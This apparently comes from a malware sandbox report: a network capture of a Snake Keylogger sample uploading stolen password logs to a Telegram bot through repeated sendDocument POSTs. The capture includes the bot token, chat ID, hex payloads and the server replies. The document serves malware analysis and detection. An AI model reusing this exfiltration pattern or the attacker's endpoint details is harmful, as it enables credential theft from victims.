                            13192.168.2.549781149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:43 UTC21OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d763a5be
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:43 UTC22OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 37 36 33 61 35 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d763a5beContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:43 UTC22INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:43 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:43 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66759,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228763,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            130192.168.2.549984149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:34 UTC219OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f59c4f71
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:34 UTC219OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 35 39 63 34 66 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f59c4f71Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:34 UTC220INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:34 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:34 UTC220INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66891,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228814,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            131192.168.2.549985149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:34 UTC221OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f5d7ec7d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:34 UTC221OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 35 64 37 65 63 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f5d7ec7dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:35 UTC222INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:35 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:35 UTC222INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66892,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228814,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            132192.168.2.549986149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:35 UTC222OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f615e5bb
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:35 UTC223OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 36 31 35 65 35 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f615e5bbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:35 UTC223INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:35 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:35 UTC224INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66893,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228815,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            133192.168.2.549987149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:35 UTC224OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f653e20d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:35 UTC224OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 36 35 33 65 32 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f653e20dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:35 UTC225INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:35 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:35 UTC225INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66895,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228815,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            134192.168.2.549988149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:35 UTC226OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f68f7cf8
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:35 UTC226OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 36 38 66 37 63 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f68f7cf8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:36 UTC227INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:36 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:36 UTC227INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66896,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228816,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            135192.168.2.549989149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:36 UTC227OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f6cd7a55
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:36 UTC228OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 36 63 64 37 61 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f6cd7a55Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:36 UTC228INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:36 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:36 UTC229INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66897,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228816,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            136192.168.2.549990149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:36 UTC229OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f701edeb
                            Host: api.telegram.org
                            Content-Length: 504
